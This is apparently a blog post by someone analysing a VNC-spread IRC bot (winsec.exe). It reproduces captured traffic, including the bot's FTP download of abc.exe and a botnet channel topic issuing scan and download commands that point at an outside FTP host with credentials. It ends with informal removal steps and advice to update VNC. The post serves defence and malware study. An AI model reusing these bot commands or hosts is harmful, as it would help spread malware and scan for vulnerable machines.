18.104.22.168 connects using VNC authentication flaw. There is no better way still to get a virus at the moment. [Are there really still that many people running the wrong VNC version (4.1.1)? Get an update, quick.] Unfortunately my attempts to have a more automated way of viewing proceedings gives garble. Chaosreader looks like a nice script but it cannot handle the authentication flaw, so you have to change the auth choice 01 02 into 01 01 manually blah blah and also the chaotic nature of TCP retransmission and out-of-order choke it considerably. Now I have to learn perl as well?!?
Anyway. The upshot is that Server connects to ftpz.redirectme.net (which at that moment is 22.214.171.124, which relates to “performance systems international” and “yourhostingaccount.com”) and obtains for me a program called abc.exe (USER jas PASS jas).
Some other files are present at this server too:
227 Entering Passive Mode (38,113,1,151,186,235) 150 Opening ASCII mode data connection for file list -r--r--r-- 1 jas www 52224 Mar 17 19:42 abc.exe -r--r--r-- 1 jas www 52224 Mar 17 19:42 cba.exe drwxr-xr-x 3 jas www 4096 Mar 17 19:43 honeybot
I am particularly curious about the “honeybot”? It’s not meant for distribution, so what does it do?
The file abc.exe is not recognized as anything malicious by Norton/Symantec – always nice to know how stupidly up-to-date their definition files are.
But onward. Server wants to connect to one of a number of sites on port 5900, to wit:
so momentarily I let it, to see what happens. Tjeinie runs IRC on these servers, cannily on port 5900.
Server signs in:
NICK W0-ao]d :irc.p0tnet.com NOTICE AUTH :*** Looking up your hostname... USER nsfbjx "fo3.net" "lol" :nsfbjx :irc.p0tnet.com NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead :irc.p0tnet.com NOTICE W0-ao]d :*** If you are having problems connecting due to ping timeouts, please type /quote pong D4E45F63 or /raw pong D4E45F63 now. PING :D4E45F63 PONG D4E45F63 :irc.p0tnet.com 001 W0-ao]d :Welcome to the oc256 IRC Network W0-ao]d![email protected] :irc.p0tnet.com 002 W0-ao]d :Your host is irc.p0tnet.com, running version Unreal3.2-beta19 :irc.p0tnet.com 003 W0-ao]d :This server was created Sun Feb 8 18:58:31 2004 :irc.p0tnet.com 004 W0-ao]d irc.p0tnet.com Unreal3.2-beta19 iowghraAsORTVSxNCWqBzvdHtGp lvhopsmntikrRcaqOALQbSeKVfMGCuzN :irc.p0tnet.com 005 W0-ao]d MAP KNOCK SAFELIST HCN MAXCHANNELS=25 MAXBANS=60 NICKLEN=30 TOPICLEN=307 KICKLEN=307 MAXTARGETS=20 AWAYLEN=307 :are supported by this server :irc.p0tnet.com 005 W0-ao]d WALLCHOPS WATCH=128 SILENCE=5 MODES=12 CHANTYPES=# PREFIX=(qaohv)~&@%+ CHANMODES=be,kfL,l,psmntirRcOAQKVGCuzNSM NETWORK=oc256 CASEMAPPING=ascii :are supported by this server :irc.p0tnet.com 375 W0-ao]d :- irc.p0tnet.com Message of the Day - :irc.p0tnet.com 372 W0-ao]d :- 17/10/2006 18:19 :irc.p0tnet.com 372 W0-ao]d :- Welcome to Sha co Irc server :irc.p0tnet.com 376 W0-ao]d :End of /MOTD command. :W0-ao]d MODE W0-ao]d :+i
JOIN #vv# f3ck0ff :W0-ao]d![email protected] JOIN :#vv# :irc.p0tnet.com 332 W0-ao]d #vv# :!scan 64 1 89.x.x.x 2 1 87.x.x.x | !setcftp ftpz.redirectme.net 21 jas jas abc.exe :irc.p0tnet.com 333 W0-ao]d #vv# haxh0x 1174989197 :irc.p0tnet.com 353 W0-ao]d @ #vv# :W0-ao]d :irc.p0tnet.com 366 W0-ao]d #vv# :End of /NAMES list.
PRIVMSG #vv# :Scanning: 89.x.x.x, 64 threads. FTP: 16874. :W3-]y[2![email protected] PRIVMSG #vv# :Scanning: 89.x.x.x, 64 threads. FTP: 27761.
JOIN #vv# f3ck0ff :W3-mpfp![email protected] PRIVMSG #vv# :Scanning: 89.x.x.x, 64 threads. FTP: 32662.
JOIN #vv# f3ck0ff :L3-k5ak![email protected] PRIVMSG #vv# :Scanning: 87.x.x.x, 64 threads. Using CFTP.
Unless otherwise modified, this server seems to have been going for quite a while…
The going command at the moment is scan on port 5900, which was set by haxh0x on Tue Mar 27 at 10:53, apparently.
Other than this, winsec.exe doesn’t seem to be doing much. It didn’t disable regedit, it didn’t open funky ports for c0v3rt ftp s3rv1ng, it’s just sitting there, listening in on this IRC channel. And since it only joins one room (well it must have wanted to join another one at some point, to report scan results) and the topic/command in that room hasn’t changed in 3 or 4 days, I can see this might turn into a long wait. Oh well. Until I get k1ck3d/b4nn3d, then.
Who he? Not a lot of googel results there. Seems to be a Danish name.
Want to get rid?
Seems easy enough – too easy?
– Stop the running process (winsec.exe).
– Delete the process (which is in sysdrive:\Program Files\Common Files\System\winsec.exe)
– Delete the auto-start from the registry:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run “WindowsSystem32” sysdrive:\Program Files\Common Files\System\winsec.exe – delete this whole key.
– That should be it. I think. At your own risk, of course.
Oh and whilst you’re at it. Update VNC. The reason you get this, and other shit like it, is because you’re running version 4.1.1. There’s been an update now for yonks. And for added security, come off the standard port!